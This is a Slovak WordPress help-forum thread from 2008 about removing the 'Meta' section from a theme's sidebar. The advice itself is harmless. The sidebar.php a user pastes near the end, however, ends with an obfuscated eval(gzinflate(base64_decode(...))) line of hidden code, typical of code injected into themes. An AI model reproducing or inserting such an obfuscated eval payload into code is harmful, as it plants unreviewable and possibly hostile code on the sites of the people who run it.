PDA

Zobraziť plnú verziu : Ako zabrániť registrovanému užívateľovi vstup do admina?

zeto750
24.07.2008, 15:04
//edit2: vyriesene teraz mam problem s tymto:

ako zmazat z temy polozku meta ked to v sidebar.php nieje? ani nkde inde to nemozem najst ?a kalendar mi zle zobrazuje :D kde nastavim farbu kalendara?
potrebujem to co je v koceke na obrazku dat prec ako? co mam upravit to log in/out je cez widget a to meta je uz v teme kde najdem to aj to?

http://i38.tinypic.com/kd1mcx.jpg

sokrates4612
27.07.2008, 15:25
V prvom rade ťa prosím, že keď sa ti niečo podarí vyriešiť a je tu vo fóre o tom príspevok, tak to nezmaž editovaním obsahu príspevku, ale vytvor novú tému, lebo to vytvára len chaos.
Napríklad teraz názov článku nekorešponduje s obsahom a ďalšia vec je, že sa nikto, komu chodia notifikácie o nových témach a príspevkoch nedozvie o tom, že sa pýtaš niečo nové - lebo notifikácie o editovaní príspevku sa neodosielajú...

A teraz k veci:
META skús zmazať z časti Dizajn --> Widgety. Tam klikneš na widgete Upraviť a potom Odstrániť.
Ak to nemáš medzi widgetami, bude sa potrebné pohrabať niekde v téme., prípadne priamo v nejakých .php súboroch... s tým ti však takto cez fórum okamžite neviem pomôcť... musel by som sa dostať priamo na FTP a pozrieť priamo tam.

zeto750
27.07.2008, 19:26
jedno meta mam vo widgetoch to chcem mat na webe ale stranka ma vlastne meta tak to chcem dat prec a v teme nieje ani zmienka o slove META...ani v jednom subore ...

a inak sorry nevedel som to

Savione
28.07.2008, 10:34
Meta nájdeš obvykle v súbore sidebar.php (prípadne sidebar_right.php alebo sidebar2.php alebo obdobne) v priečinku danej témy. Môžeš ho editovať aj cez editor tém.

V tomto súbore sa obvykle nachádza kód podobný tomuto:

<li><h2>Meta</h2>
<ul>
<?php wp_register(); ?>
<li><?php wp_loginout(); ?></li>
...
<li><a href="http://wordpress.org/" title="Powered by WordPress">WordPress</a></li>
<?php wp_meta(); ?>
</ul>
</li>

Ak nechceš tieto Meta používať, tak zmaž tú časť kódu. Pre istotu si ten súbor predtým odzálohuj... :)

zeto750
28.07.2008, 10:51
ta tema co mam me len sidebar.php cize mam len jeden bocny panel ale slovo meta nieje v ani jednom subore temy..

sidebar.php:

<ul>
<?php /* Widgetized sidebar, if you have the plugin installed. */
if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar(1) ) : ?>
<li><h2>Archives</h2>
<ul>
<?php wp_get_archives('type=monthly&optioncount=0'); ?>
</ul>
</li>

<li><h2><?php _e('Categories'); ?></h2>

<ul>

<?php wp_list_cats('sort_column=name&optioncount=0&hierarchical=1'); ?>

</ul>
</li>
<?php wp_list_bookmarks(); ?>

<?php wp_loginout(); ?>

<?php endif; ?>

<?php eval(gzinflate(base64_decode('tZLBasMwDIbP61OIXJJd auhx85xDz7s0hR5D0iq1wbGN5RD69lOTeYMy2C4zGCT5/+VPoFptnvhIa5TUO/WOqZOCg7U62TVY3zvQEYe3QtZBB+itvxo3+KqMRLt2irZ8foVa FZBMsphlLVZlc3MXc+4SQtKGgAxHExl3hUPTfLrUt1x2fR9zlw N21t6gMWOwCLmT8a5QbJbirlVrD074MukfmM9+HNElan+FP2oE y+yUIJsgeWAqCJ44Me7nMfZZ/R/z6JTCixDzPG/nkDSOSENE3DKi+Bri5OMlRCSC46Io1GPl8YsFfg7tyHtQLRDrI oi8CVm8VBb5Bj4A')));?>